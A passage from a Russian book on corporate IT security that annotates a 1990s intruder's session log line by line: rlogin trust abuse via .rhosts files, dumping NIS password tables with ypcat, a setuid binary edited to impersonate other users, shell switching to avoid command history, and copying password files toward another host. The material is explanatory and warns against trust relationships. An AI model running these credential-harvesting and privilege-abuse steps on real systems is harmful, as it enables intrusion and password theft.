Читаем IT-безопасность: стоит ли рисковать корпорацией? полностью

Теперь он ищет, куда еще можно пойти, посылая команды rlogin в другие системы и определяя те из них, которые бы доверяли lorimo (файлы. rhosts и /etc/hosts.equiv используются для установления доверия между системами). Если lorimo доверяют другие системы, то хакеру будет предоставлен доступ к этим системам без ввода пароля. Это называется «барабанить в двери» ("door rattling"). Если ему повезет, то он получит доступ к еще большему объему информации и создаст места для запуска будущих атак изнутри.

Строка № 89

Хакер сменил свою авторизацию обратно на суперпользователя (root).

Строки с № 90 по № 92

Он снова оглядывается (отсюда и команда "who"), затем проводит двойной контроль правильности полученной информации ID пользователя.

Строки с № 93 по № 94

Хакер ищет lorimo в таблице паролей сетевой информационной службы NIS.

Строка № 95

Хакер переходит в каталог /home.

76 $ rlogin tsunami

77 Password:

78 Login incorrect

79 Login incorrect

80 login: AD

81 Connection closed.

82 $ rlogjn suntzu

83 rlogjn: not found

84 $ rlogin suntzu

85 Password:

86 Login incorrect

87 login: D

88 Connection closed.

89 $"D

90 «who

91 ingres ttyp0 Jan 18 23:02

92 root ttyp2 Jan 15 18:38 (canyon)

93 # ypcat passwd | grep lorimo

94 lorimo: xxYTF8y3fSqGo:21477:50:Lori:/home/lorimo:/bin/csh

95 # cd /home

Строка № 96

Хакер начинает подготовительную работу по поиску файлов .rhost, имеющихся в /home. Смысл такого поиска состоит в том, что некоторые люди, использующие файл .rhost (для установки доверия), могут иметь много записей в .rhost по всей сети. После запуска этой задачи он пошел дальше.

Строки с № 97 по № 98

Хакер продолжает делать опечатки.

Строки с № 99 по № 100

Нашему другу надоело быть lorimo. Он проверяет файл паролей на наличие jeff. Он решает выдать себя за jeff. Но вначале он должен отредактировать свой код.

Строки с № 101 по № 11З

Он пытается редактировать свой код, но он не в том каталоге. Он переходит в правильный каталог, редактирует код, исполняет код и становится пользователем jeff.

Строки с № 114 по № 119

Став jeff хакер сделал правильный выбор. Он вошел в новую систему (tsunami), даже не пользуясь паролем. (Это отличный пример того, как опасно устанавливать доверительные отношения между системами.)

96 # find. -name.rhosts — print &

97 # gupr

98 # grep" C

99 # ypcat passwd | grep jeff

100 jeff: wW/q0t03L6xO.:13147:50:Jeff:/home/jeff:/bin/csh

101 # ed c.c

102 ?c,c: No such file or directory

103 #cd

104 # edc.c

105 /uid/

106 setuid(21477);

107 setuid(13147);

108 #ссс. с

109 # mv a.out shit

110 #chmod 6777 shit

111 #./shit

112 $ id

113 uid=13147(jeff) gid=0(wheel) groups=7

114 $ rlogj tsunami

115 rlogj: not found

116 $ rlogin tsunami

117 No directory! Logging in with home=/

118 SunOS Release 4.1.2 (TSUNAMI) #3: Sat Oct 24 07:56:45 PDT 1992

119 You have new mail.

Строки с № 120 по № 126

Хакер (который сейчас является пользователем jeff), запускает командную оболочку sh, чтобы не оставлять след в журналах. history оболочки csh. (Хакер тщательно следит за тем, чтобы не оставить свидетельств применения своих команд.) Затем он проверяет, нет ли кого еще в системе.

Строки с № 127 по № 136

Хакер пытается скопировать файл паролей и получает отказ в разрешении, так как у него нет разрешения копировать в этот каталог. Он проводит проверку с целью установить, под каким именем он зарегистрировался (должно быть, он уже его забыл). Он видит, что зарегистрировался как Jeff. Так как Jeff не имеет разрешения копировать файлы в этот каталог, то хакер меняет каталог на /tmp, в который любому пользователю разрешено производить копирование.

Строки с № 137 по № 141

Здесь он немного расправляет крылья и ищет таблицу паролей, чтобы ее скопировать и использовать. (Он копирует файл паролей NIS в файл, названный "ааа".) Хакеры часто копируют файлы паролей, чтобы подвергнуть их действию программ-взломщиков и получить больше паролей. Чем больше паролей есть у хакера, тем лучше он преуспеет в набегах на другие системы.

120 tsunami%AC

121 tsunami%sh

122 $ who

123 wendy ttyp2 Jan 6 13:55 (arawana)

124 derek ttyp3 Jan 13 17:57 (lajolla)

125 derekttyp4Jan 15 13:11 (lajolla)

126 jeff ttyp5 Jan 18 23:09 (valley)

127 $cat/etc/passwdAC

128 $ypcaty" C

129 $ ypcat passwd > suna

130 suna: Permission denied

131 Sid

132 uid=4401(jeff) gid=50(lastaff) groups=50(lastaff)

133 $pwd

134 $cd

135 $pwd

136 $cd/tmp

137 $ ypcat passwd >aaa

138 $ Is — tal aa

139 aa not found

140 $ is — tal aaa

141 — rw-r — r— 1 jeff 15382 Jan 18 23:09 aaa

Строки с № 142 по № 162

Теперь он открывает сессию ftp обратно к первоначальному хосту (valley) как пользователь ingres. В этой сессии он копирует файл паролей в систему valley. В той же самой сессии он копирует свои инструменты по работе с защитой из valley в tsunami.

Строки с № 163 по № 173